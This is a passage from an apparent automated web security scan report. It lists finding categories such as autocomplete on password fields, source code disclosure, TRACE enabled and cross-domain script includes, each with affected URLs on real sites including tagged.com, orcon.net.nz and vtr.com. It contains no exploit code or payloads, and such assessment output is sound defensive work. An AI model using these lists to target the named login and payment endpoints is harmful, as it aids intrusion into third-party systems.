14.47. http://r1-ads.ace.advertising.com/ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

14.48. http://r1-ads.ace.advertising.com/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

14.49. http://r1-ads.ace.advertising.com/site=705487/size=300250/u=2/bnum=43626829/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

14.50. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=24438061/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

14.51. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=28476770/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

14.52. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=92522527/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions

14.53. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=11211453/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html

14.54. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=12741032/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html

14.55. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=24692193/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions

14.56. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=28905079/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

14.57. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=36738221/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

14.58. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=37579081/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html

14.59. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=42928792/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html%253Ftopic%253Dreport-abuse

14.60. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=44415793/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

14.61. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=49573366/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fsafety.html

14.62. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=58838557/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

14.63. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=68130074/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fbrowse.html

14.64. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=69569526/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html

14.65. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

14.66. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=81707588/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Ffind_groups.html

14.67. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=94465860/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

14.68. http://secure.tagged.com/

14.69. https://secure.tagged.com/secure_login.html

14.70. http://segment-pixel.invitemedia.com/pixel

14.71. http://translate.googleapis.com/translate_a/t

14.72. http://tweetbeat.com/

14.73. http://tweetbeat.com/favicon.ico

14.74. http://tweetbeat.com/images/ajax-loader.gif

14.75. http://tweetbeat.com/images/available_on_appstore.png

14.76. http://tweetbeat.com/images/bg_halo_live_reactions.png

14.77. http://tweetbeat.com/images/bg_page.png

14.78. http://tweetbeat.com/images/btn_feedback_UP.png

14.79. http://tweetbeat.com/images/btn_home_search_go.png

14.80. http://tweetbeat.com/images/bubble_wedge.png

14.81. http://tweetbeat.com/images/fb_badge.gif

14.82. http://tweetbeat.com/images/follow_us-b.png

14.83. http://tweetbeat.com/images/icon_Trending-Today_Velocity_down.png

14.84. http://tweetbeat.com/images/icon_Trending-Today_Velocity_up.png

14.85. http://tweetbeat.com/images/icon_live_reactions_antenna_home.png

14.86. http://tweetbeat.com/images/logo_home.png

14.87. http://tweetbeat.com/images/reactions_slanted_border.png

14.88. http://tweetbeat.com/images/twitter_rt_light.png

14.89. http://tweetbeat.com/images/verified.gif

14.90. http://tweetbeat.com/javascripts/all.js

14.91. http://tweetbeat.com/javascripts/external_libs/highcharts/highcharts.js

14.92. http://tweetbeat.com/javascripts/portlets.js

14.93. http://tweetbeat.com/stylesheets/960.css

14.94. http://tweetbeat.com/stylesheets/external/carousel/carousel.css

14.95. http://tweetbeat.com/stylesheets/external/prettyPhoto.css

14.96. http://tweetbeat.com/stylesheets/external/ui-lightness/autocomplete.css

14.97. http://tweetbeat.com/stylesheets/home.css

14.98. http://tweetbeat.com/stylesheets/main.css

14.99. http://tweetbeat.com/type/BebasNeue.otf

14.100. http://www.kosmix.com/

14.101. http://www.kosmix.com/c-javascripts/kapp_relevance.js

14.102. http://www.kosmix.com/images/ck.txt

14.103. http://www.kosmix.com/images/favicon.ico

14.104. http://www.kosmix.com/images/homepage/announcement.png

14.105. http://www.kosmix.com/images/homepage/righthealth_link.png

14.106. http://www.kosmix.com/images/homepage/tweetbeat_link.png

14.107. http://www.kosmix.com/images/homepage/walmart_labs.png

14.108. http://www.kosmix.com/images/homepage_stars/stars.png

14.109. http://www.kosmix.com/images/mpv.txt

14.110. http://www.kosmix.com/images/pv.txt

14.111. http://www.kosmix.com/images/redesign/body_bg_trans.png

14.112. http://www.kosmix.com/images/sprites/fark-sprite.png

14.113. http://www.kosmix.com/images/sprites/favicon-sprite.png

14.114. http://www.kosmix.com/images/upv.txt

14.115. http://www.kosmix.com/javascripts/cache/options_bottom-kosmix-sem-chimborazo-152138.js

14.116. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js

14.117. http://www.kosmix.com/javascripts/cache/topic_bottom_homepage-kosmix-sem-chimborazo-152138.js

14.118. http://www.kosmix.com/javascripts/cache/topic_top-s_kosmix-chimborazo-152138.js

14.119. http://www.kosmix.com/kosmixSearch.xml

14.120. http://www.kosmix.com/stylesheets/cache/topic-s_kosmix-chimborazo-152138.css

14.121. http://www.kosmix.com/stylesheets/cache/topic_page_redesign-s_kosmix-chimborazo-152138.css

14.122. http://www.orcon.net.nz/

14.123. http://www.orcon.net.nz/about

14.124. http://www.orcon.net.nz/about/

14.125. http://www.orcon.net.nz/about/Terms_and_conditions

14.126. http://www.orcon.net.nz/about/browse/category/acquisitions/

14.127. http://www.orcon.net.nz/about/browse/category/awards/

14.128. http://www.orcon.net.nz/about/browse/category/media_releases/

14.129. http://www.orcon.net.nz/about/browse/category/news/

14.130. http://www.orcon.net.nz/about/careers

14.131. http://www.orcon.net.nz/about/careers/

14.132. http://www.orcon.net.nz/about/page/Privacy

14.133. http://www.orcon.net.nz/about/page/about_orcon

14.134. http://www.orcon.net.nz/about/page/contact_us

14.135. http://www.orcon.net.nz/about/sitemap

14.136. http://www.orcon.net.nz/about/sitemap/

14.137. http://www.orcon.net.nz/about/staff/

14.138. http://www.orcon.net.nz/address_locator/=&type=orconatwork

14.139. http://www.orcon.net.nz/business

14.140. http://www.orcon.net.nz/campaigns/landing/1monthfree

14.141. http://www.orcon.net.nz/home/

14.142. http://www.orcon.net.nz/home/dial-up/

14.143. http://www.orcon.net.nz/home/page/about_orcon_plus

14.144. http://www.orcon.net.nz/home/page/broadband_modems

14.145. http://www.orcon.net.nz/home/page/home_email

14.146. http://www.orcon.net.nz/home/page/o_zone

14.147. http://www.orcon.net.nz/home/page/orcon_homeline_and_tolls

14.148. http://www.orcon.net.nz/home/plans/

14.149. http://www.orcon.net.nz/img/bg_copy.gif

14.150. http://www.orcon.net.nz/index.php

14.151. http://www.orcon.net.nz/index.php/about/browse/category/acquisitions/P10/

14.152. http://www.orcon.net.nz/index.php/about/browse/category/acquisitions/P25/

14.153. http://www.orcon.net.nz/index.php/about/browse/category/acquisitions/P5/

14.154. http://www.orcon.net.nz/lifestyle

14.155. http://www.orcon.net.nz/lifestyle/rss

14.156. http://www.orcon.net.nz/mobile

14.157. http://www.orcon.net.nz/mobile/

14.158. http://www.orcon.net.nz/no-brainer/joinUs

14.159. http://www.orcon.net.nz/site/login

14.160. http://www.orcon.net.nz/site/login/=&result=failure

14.161. http://www.orcon.net.nz/support

14.162. http://www.orcon.net.nz/support/

14.163. http://www.orcon.net.nz/support/browse/category/cloud_computing

14.164. http://www.orcon.net.nz/support/glossary/category/a

14.165. http://www.orcon.net.nz/support/network_status

14.166. http://www.orcon.net.nz/support/network_status_rss

14.167. http://www.orcon.net.nz/support/page/how_to_call_international_destinations_from_your_mobile

14.168. http://www.orcon.net.nz/support/page/roaming_charges_activation

14.169. http://www.orcon.net.nz/support/page/setting_up_your_mobile_voicemail

14.170. http://www.orcon.net.nz/support/page/what_are_your_dns_server_addresses

14.171. http://www.orcon.net.nz/support/page/what_does_standby_mean

14.172. http://www.orcon.net.nz/support/page/will_my_phone_number_change_with_orcon_homeline

14.173. http://www.orcon.net.nz/support/talk

14.174. http://www.orcon.net.nz/work/

14.175. http://www.orcon.net.nz/work/=&ref=iserve

14.176. http://www.orcon.net.nz/work/business_phone_sip_trunk

14.177. http://www.orcon.net.nz/work/hosting_plans/

14.178. http://www.orcon.net.nz/work/page/business_broadband_overview

14.179. http://www.orcon.net.nz/work/page/business_phone_line

14.180. http://www.orcon.net.nz/work/page/business_server_dedicated

14.181. http://www.orcon.net.nz/work/page/business_server_hosting_overview

14.182. http://www.orcon.net.nz/work/page/business_server_software

14.183. http://www.orcon.net.nz/work/page/business_server_virtual

14.184. http://www.orcon.net.nz/work/page/case_study_certus

14.185. http://www.orcon.net.nz/work/page/case_study_speedscan

14.186. http://www.orcon.net.nz/work/page/case_study_zeald

14.187. http://www.orcon.net.nz/work/page/cloud_computing_overview

14.188. http://www.orcon.net.nz/work/page/co-location

14.189. http://www.orcon.net.nz/work/page/domain_names_overview

14.190. http://www.orcon.net.nz/work/page/fibre_optic

14.191. http://www.orcon.net.nz/work/page/free_domain_hosting

14.192. http://www.orcon.net.nz/work/page/hosted_exchange

14.193. http://www.orcon.net.nz/work/page/hsns

14.194. http://www.orcon.net.nz/work/page/register_a_domain

14.195. http://www.orcon.net.nz/work/page/sip_trunk

14.196. http://www.orcon.net.nz/work/page/sip_trunk_data_sheet

14.197. http://www.orcon.net.nz/work/page/wan

14.198. http://www.orcon.net.nz/work/page/zealous_support

14.199. http://www.orcon.net.nz/work/plans

14.200. http://www.orcon.net.nz/work/wholesale_services

14.201. http://www.righthealth.com/

14.202. http://www.righthealth.com/c-javascripts/kapp_relevance.js

14.203. http://www.righthealth.com/images/health/HONConduct767461_s.gif

14.204. http://www.righthealth.com/images/health/affiliates/adam.png

14.205. http://www.righthealth.com/images/health/affiliates/ashp.png

14.206. http://www.righthealth.com/images/health/affiliates/bodymaps.png

14.207. http://www.righthealth.com/images/health/affiliates/dailystrength.png

14.208. http://www.righthealth.com/images/health/affiliates/familydoctor.png

14.209. http://www.righthealth.com/images/health/affiliates/fatsecret.png

14.210. http://www.righthealth.com/images/health/affiliates/healthvideo.png

14.211. http://www.righthealth.com/images/health/affiliates/mamaherb.png

14.212. http://www.righthealth.com/images/health/affiliates/mydailyapple.png

14.213. http://www.righthealth.com/images/health/affiliates/truveo.png

14.214. http://www.righthealth.com/images/health/blog_profiles/steven.png

14.215. http://www.righthealth.com/images/health/dailydose-icon-facebook.png

14.216. http://www.righthealth.com/images/health/dailydose-icon-mail.png

14.217. http://www.righthealth.com/images/health/dailydose-icon-twitter.png

14.218. http://www.righthealth.com/images/health/dailydose-small.png

14.219. http://www.righthealth.com/images/health/editorspick-arrow.gif

14.220. http://www.righthealth.com/images/health/editorspick/Black_Tea_thumbnail.jpg

14.221. http://www.righthealth.com/images/health/editorspick/Chronic_Pain.jpg

14.222. http://www.righthealth.com/images/health/editorspick/Cluster_Headache_thumbnail.jpg

14.223. http://www.righthealth.com/images/health/editorspick/Medical_Marijuana_thumbnail.jpg

14.224. http://www.righthealth.com/images/health/editorspick/Smoking_Cessation_thumbnail.jpg

14.225. http://www.righthealth.com/images/health/favicon.ico

14.226. http://www.righthealth.com/images/mpv.txt

14.227. http://www.righthealth.com/images/pv.txt

14.228. http://www.righthealth.com/images/sprites/fark-sprite.png

14.229. http://www.righthealth.com/images/sprites/favicon-sprite.png

14.230. http://www.righthealth.com/images/upv.txt

14.231. http://www.righthealth.com/javascripts/cache/options_bottom-righthealth-sem-chimborazo-153574.js

14.232. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js

14.233. http://www.righthealth.com/javascripts/cache/topic_bottom_homepage-righthealth-sem-chimborazo-153574.js

14.234. http://www.righthealth.com/javascripts/cache/topic_top-s_righthealth-chimborazo-153574.js

14.235. http://www.righthealth.com/kosmixSearch.xml

14.236. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-chimborazo-153574.css

15. Password field with autocomplete enabled

15.1. https://console.iserve.net.nz/

15.2. https://console.iserve.net.nz/webmail/src/login.php

15.3. https://console.iservices.net.nz/

15.4. https://idm.net.nz/secure/

15.5. https://idm.net.nz/secure/index.php

15.6. https://secure.tagged.com/secure_login.html

15.7. https://secure.tagged.com/secure_login.html

15.8. https://secure.tagged.com/secure_login.html

15.9. https://secure.tagged.com/secure_login.html

15.10. https://secure.tagged.com/secure_login.html

15.11. https://secure.tagged.com/secure_login.html

15.12. http://vtr.com/index.html

15.13. http://vtr.com/sucursal.php

15.14. http://webmail.vtr.net/

15.15. http://webmail.vtr.net/

15.16. http://www.kol.co.nz/account.php

15.17. http://www.kol.co.nz/account.php

15.18. http://www.kol.co.nz/payment/credit.php

15.19. http://www.kol.co.nz/webmail.php

15.20. http://www.orcon.net.nz/site/login

15.21. http://www.orcon.net.nz/site/login/=&result=failure

16. Source code disclosure

16.1. http://vtr.com/js/funciones.js

16.2. http://www.kol.co.nz/js/zxml.js

16.3. http://www.orcon.net.nz/work/business_phone_sip_trunk

16.4. http://www.orcon.net.nz/work/wholesale_services

17. Referer-dependent response

17.1. http://ad.doubleclick.net/adj/N3671.AOL/B5229711.6

17.2. http://hits.e.cl/cert/hit.dll

17.3. http://www.facebook.com/plugins/like.php

18. Cross-domain POST

18.1. https://console.iservices.net.nz/

18.2. https://console.iservices.net.nz/

18.3. http://www.kol.co.nz/account.php

18.4. http://www.orcon.net.nz/

18.5. http://www.orcon.net.nz/about

18.6. http://www.orcon.net.nz/about/

18.7. http://www.orcon.net.nz/about/Terms_and_conditions

18.8. http://www.orcon.net.nz/about/browse/category/acquisitions/

18.9. http://www.orcon.net.nz/about/browse/category/awards/

18.10. http://www.orcon.net.nz/about/browse/category/media_releases/

18.11. http://www.orcon.net.nz/about/browse/category/news/

18.12. http://www.orcon.net.nz/about/careers

18.13. http://www.orcon.net.nz/about/careers/

18.14. http://www.orcon.net.nz/about/page/Privacy

18.15. http://www.orcon.net.nz/about/page/about_orcon

18.16. http://www.orcon.net.nz/about/page/contact_us

18.17. http://www.orcon.net.nz/about/sitemap

18.18. http://www.orcon.net.nz/about/sitemap/

18.19. http://www.orcon.net.nz/about/staff/

18.20. http://www.orcon.net.nz/address_locator/=&type=orconatwork

18.21. http://www.orcon.net.nz/business

18.22. http://www.orcon.net.nz/campaigns/landing/1monthfree

18.23. http://www.orcon.net.nz/home/

18.24. http://www.orcon.net.nz/home/dial-up/

18.25. http://www.orcon.net.nz/home/page/about_orcon_plus

18.26. http://www.orcon.net.nz/home/page/broadband_modems

18.27. http://www.orcon.net.nz/home/page/home_email

18.28. http://www.orcon.net.nz/home/page/o_zone

18.29. http://www.orcon.net.nz/home/page/orcon_homeline_and_tolls

18.30. http://www.orcon.net.nz/home/plans/

18.31. http://www.orcon.net.nz/home/rural/

18.32. http://www.orcon.net.nz/img/bg_copy.gif

18.33. http://www.orcon.net.nz/index.php

18.34. http://www.orcon.net.nz/index.php/about/browse/category/acquisitions/P10/

18.35. http://www.orcon.net.nz/index.php/about/browse/category/acquisitions/P25/

18.36. http://www.orcon.net.nz/index.php/about/browse/category/acquisitions/P5/

18.37. http://www.orcon.net.nz/lifestyle

18.38. http://www.orcon.net.nz/mobile

18.39. http://www.orcon.net.nz/mobile/

18.40. http://www.orcon.net.nz/mobile/broadband-plans

18.41. http://www.orcon.net.nz/mobile/broadband-plans/upgrade

18.42. http://www.orcon.net.nz/mobile/handsets

18.43. http://www.orcon.net.nz/mobile/plans

18.44. http://www.orcon.net.nz/mobile/plans/upgrade

18.45. http://www.orcon.net.nz/site/login

18.46. http://www.orcon.net.nz/site/login

18.47. http://www.orcon.net.nz/site/login/=&result=failure

18.48. http://www.orcon.net.nz/site/login/=&result=failure

18.49. http://www.orcon.net.nz/support

18.50. http://www.orcon.net.nz/support/

18.51. http://www.orcon.net.nz/support/browse/category/cloud_computing

18.52. http://www.orcon.net.nz/support/glossary/category/a

18.53. http://www.orcon.net.nz/support/network_status

18.54. http://www.orcon.net.nz/support/page/how_to_call_international_destinations_from_your_mobile

18.55. http://www.orcon.net.nz/support/page/roaming_charges_activation

18.56. http://www.orcon.net.nz/support/page/setting_up_your_mobile_voicemail

18.57. http://www.orcon.net.nz/support/page/what_are_your_dns_server_addresses

18.58. http://www.orcon.net.nz/support/page/what_does_standby_mean

18.59. http://www.orcon.net.nz/support/page/will_my_phone_number_change_with_orcon_homeline

18.60. http://www.orcon.net.nz/support/talk

18.61. http://www.orcon.net.nz/work/

18.62. http://www.orcon.net.nz/work/=&ref=iserve

18.63. http://www.orcon.net.nz/work/business_hosting

18.64. http://www.orcon.net.nz/work/business_internet

18.65. http://www.orcon.net.nz/work/business_phone_sip_trunk

18.66. http://www.orcon.net.nz/work/hosting_plans/

18.67. http://www.orcon.net.nz/work/hosting_plans/

18.68. http://www.orcon.net.nz/work/page/business_broadband_overview

18.69. http://www.orcon.net.nz/work/page/business_phone_line

18.70. http://www.orcon.net.nz/work/page/business_server_dedicated

18.71. http://www.orcon.net.nz/work/page/business_server_hosting_overview

18.72. http://www.orcon.net.nz/work/page/business_server_software

18.73. http://www.orcon.net.nz/work/page/business_server_virtual

18.74. http://www.orcon.net.nz/work/page/case_study_certus

18.75. http://www.orcon.net.nz/work/page/case_study_speedscan

18.76. http://www.orcon.net.nz/work/page/case_study_zeald

18.77. http://www.orcon.net.nz/work/page/cloud_computing_overview

18.78. http://www.orcon.net.nz/work/page/co-location

18.79. http://www.orcon.net.nz/work/page/domain_names_overview

18.80. http://www.orcon.net.nz/work/page/fibre_optic

18.81. http://www.orcon.net.nz/work/page/free_domain_hosting

18.82. http://www.orcon.net.nz/work/page/hosted_exchange

18.83. http://www.orcon.net.nz/work/page/hsns

18.84. http://www.orcon.net.nz/work/page/register_a_domain

18.85. http://www.orcon.net.nz/work/page/sip_trunk

18.86. http://www.orcon.net.nz/work/page/sip_trunk_data_sheet

18.87. http://www.orcon.net.nz/work/page/wan

18.88. http://www.orcon.net.nz/work/page/zealous_support

18.89. http://www.orcon.net.nz/work/plans

18.90. http://www.orcon.net.nz/work/wholesale_services

19. Cross-domain Referer leakage

19.1. http://ads.pointroll.com/PortalServe/

19.2. http://choices.truste.com/ca

19.3. http://choicesj.truste.com/ca

19.4. http://cm.g.doubleclick.net/pixel

19.5. http://cms.ad.yieldmanager.net/v1/cms

19.6. http://cms.ad.yieldmanager.net/v1/cms

19.7. http://googleads.g.doubleclick.net/pagead/ads

19.8. http://googleads.g.doubleclick.net/pagead/ads

19.9. http://googleads.g.doubleclick.net/pagead/ads

19.10. https://secure.tagged.com/register.html

19.11. http://tweetbeat.com/javascripts/all.js

19.12. http://vtr.com/empresa/prensa/index.php

19.13. http://vtr.com/empresa/somosvtr/index.php

19.14. http://www.facebook.com/plugins/like.php

19.15. http://www.kosmix.com/javascripts/cache/topic_bottom-kosmix-sem-chimborazo-152138.js

19.16. http://www.righthealth.com/javascripts/cache/topic_bottom-righthealth-sem-chimborazo-153574.js

19.17. http://www.righthealth.com/stylesheets/cache/topic-s_righthealth-chimborazo-153574.css

19.18. http://www.tagged.com/help.html

19.19. http://www.tagged.com/index.html

19.20. http://www.tagged.com/terms_of_service.html

20. Cross-domain script include

20.1. http://about-tagged.com/

20.2. http://code.google.com/p/swfobject/

20.3. https://console.iservices.net.nz/

20.4. http://googleads.g.doubleclick.net/pagead/ads

20.5. http://googleads.g.doubleclick.net/pagead/ads

20.6. https://idm.net.nz/secure/

20.7. https://idm.net.nz/secure/index.php

20.8. http://jquery.andreaseberhard.de/

20.9. http://jquery.com/

20.10. http://jquery.malsup.com/cycle/

20.11. http://malsup.com/jquery/cycle/

20.12. http://medienfreunde.com/lab/innerfade/

20.13. http://r1-ads.ace.advertising.com/ctst=1/site=704672/size=728090/u=2/bnum=38037262/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

20.14. http://r1-ads.ace.advertising.com/ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

20.15. http://r1-ads.ace.advertising.com/site=776691/size=300250/u=2/bnum=28476770/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

20.16. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=11211453/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fhelp.html

20.17. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=24692193/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Findex.html%253Fr%253D%25252Fideas.html%25253Ftype%25253Dsuggestions

20.18. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=28905079/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

20.19. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=36738221/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

20.20. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=37579081/hr=13/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fforgot_password.html

20.21. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=44415793/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

20.22. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=49573366/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fsafety.html

20.23. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=69569526/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html

20.24. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=94465860/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

20.25. https://secure.tagged.com/register.html

20.26. http://signup.kol.co.nz/customers/Calling_bundle_promotion.asp

20.27. http://tweetbeat.com/

20.28. http://vtr.com/empresa/

20.29. http://vtr.com/empresa/prensa/images/boton_portada2.gif

20.30. http://vtr.com/empresa/prensa/index.php

20.31. http://vtr.com/empresa/somosvtr/index.php

20.32. http://vtr.com/index.html

20.33. http://vtr.com/sucursal.php

20.34. http://vtr.com/vtr.com/concursos

20.35. http://vtr.com/vtr.com/css/anexas2011.css

20.36. http://vtr.com/vtr.com/css/header2011-simple.css

20.37. http://vtr.com/vtr.com/js/tabla.js

20.38. http://webmail.vtr.net/

20.39. http://www.facebook.com/plugins/like.php

20.40. http://www.kosmix.com/

20.41. http://www.mathias-bank.de/

20.42. http://www.opensource.org/licenses/gpl-license.php

20.43. http://www.opensource.org/licenses/mit-license.php

20.44. http://www.orcon.net.nz/

20.45. http://www.orcon.net.nz/business

20.46. http://www.orcon.net.nz/home/page/about_orcon_plus

20.47. http://www.orcon.net.nz/index.php

20.48. http://www.orcon.net.nz/work/

20.49. http://www.orcon.net.nz/work/=&ref=iserve

20.50. http://www.orcon.net.nz/work/business_internet

20.51. http://www.orcon.net.nz/work/page/business_broadband_overview

20.52. http://www.orcon.net.nz/work/page/fibre_optic

20.53. http://www.orcon.net.nz/work/page/hsns

20.54. http://www.orcon.net.nz/work/page/wan

20.55. http://www.orcon.net.nz/work/plans

20.56. http://www.righthealth.com/

20.57. http://www.tagged.com/

20.58. http://www.tagged.com/browse.html

20.59. http://www.tagged.com/find_groups.html

20.60. http://www.tagged.com/forgot_password.html

20.61. http://www.tagged.com/help.html

20.62. http://www.tagged.com/index.html

20.63. http://www.tagged.com/safety.html

20.64. http://www.tagged.com/terms_of_service.html

21. TRACE method is enabled

21.1. http://a.dlqm.net/

21.2. http://about-tagged.com/

21.3. http://amch.questionmarket.com/

21.4. http://bh.contextweb.com/

21.5. https://console.iservices.net.nz/

21.6. http://help.tagged.com/

21.7. http://hits.e.cl/

21.8. http://idm.net.nz/

21.9. https://idm.net.nz/

21.10. http://jigsaw.w3.org/

21.11. http://jquery.andreaseberhard.de/

21.12. http://jquery.com/

21.13. https://mail.orcon.net.nz/

21.14. http://pixel.rubiconproject.com/

21.15. https://secure-static.tagged.com/

21.16. http://secure.tagged.com/

21.17. https://secure.tagged.com/

21.18. http://sizzlejs.com/

21.19. http://t.mookie1.com/

21.20. http://vtr.com/

21.21. http://webmail.iserve.net.nz/

21.22. http://webmail.orcon.net.nz/

21.23. http://www.benjaminsterling.com/

21.24. http://www.kiwionline.co.nz/

21.25. http://www.kol.co.nz/

21.26. http://www.opensource.org/

21.27. http://www.orcon.net.nz/

21.28. http://www.tagged.com/

22. Email addresses disclosed

22.1. http://about-tagged.com/news

22.2. http://code.google.com/p/swfobject/

22.3. https://console.iservices.net.nz/

22.4. https://console.iservices.net.nz/scripts/jquery.pngFix.pack.js

22.5. https://d2s.iserve.net.nz:8443/

22.6. https://d2s.iserve.net.nz:8443/index.html

22.7. http://tweetbeat.com/javascripts/all.js

22.8. http://tweetbeat.com/type/BebasNeue.otf

22.9. http://vtr.com/empresa/

22.10. http://vtr.com/js/jquery.hoverIntent.minified.js

